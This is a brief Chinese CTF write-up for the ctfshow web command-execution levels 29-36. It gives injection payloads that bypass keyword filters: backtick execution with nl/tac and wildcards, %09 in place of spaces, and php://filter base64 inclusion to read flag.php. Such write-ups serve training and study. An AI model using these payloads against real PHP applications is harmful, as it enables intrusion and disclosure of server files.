ctfshow-web入门命令执行29-36

29

ctfshow-web入门命令执行29-36_第1张图片源代码给了禁用flag

使用tac、nl

?c=echo `nl f*`;
?c=echo `tac f*`;

30

ctfshow-web入门命令执行29-36_第2张图片

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;
?c=echo `tac f*`;

 31

ctfshow-web入门命令执行29-36_第3张图片

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

ctfshow-web入门命令执行29-36_第4张图片

禁用了echo

使用php伪协议

?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

ctfshow-web入门命令执行29-36_第5张图片

多过滤了"

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

你可能感兴趣的:(linux,运维,服务器)